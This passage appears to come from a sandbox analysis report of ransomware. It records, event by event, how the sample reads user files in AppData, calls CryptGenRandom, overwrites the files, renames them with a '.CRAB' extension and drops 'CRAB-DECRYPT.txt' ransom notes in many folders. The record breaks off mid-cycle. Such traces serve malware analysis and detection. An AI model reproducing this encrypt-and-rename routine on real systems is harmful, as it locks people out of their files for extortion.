| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3, size = 1048576, size_out = 38961 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3, size = 38976 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4, size = 1048576, size_out = 89217 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4, size = 89232 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots, size = 1048576, size_out = 99521 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots, size = 99536 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4, size = 1048576, size_out = 29747 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4, size = 29760 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt, size = 1048576, size_out = 86607 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt, size = 86608 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv, size = 1048576, size_out = 89244 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv, size = 89248 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi, size = 1048576, size_out = 52416 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi, size = 52416 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf, size = 1048576, size_out = 100297 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf, size = 100304 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\je8O8Wzi8buOk7-5Nx6.m4a, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\je8O8Wzi8buOk7-5Nx6.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\je8O8Wzi8buOk7-5Nx6.m4a, size = 1048576, size_out = 8071 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\je8O8Wzi8buOk7-5Nx6.m4a, size = 8080 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\je8O8Wzi8buOk7-5Nx6.m4a, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\je8O8Wzi8buOk7-5Nx6.m4a, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\je8O8Wzi8buOk7-5Nx6.m4a, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\je8O8Wzi8buOk7-5Nx6.m4a.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\KdoskM.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\KdoskM.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\KdoskM.avi, size = 1048576, size_out = 5554 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\KdoskM.avi, size = 5568 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\KdoskM.avi, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\KdoskM.avi, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\KdoskM.avi, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\KdoskM.avi.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\P7UB2489\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\P7UB2489\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol, size = 1048576, size_out = 506 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol, size = 512 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\AddIns\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\AddIns\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl, size = 1048576, size_out = 333602 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl, size = 333616 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL, size = 1048576, size_out = 297017 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL, size = 297024 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL, size = 1048576, size_out = 268670 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL, size = 268672 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL, size = 1048576, size_out = 256358 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL, size = 256368 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
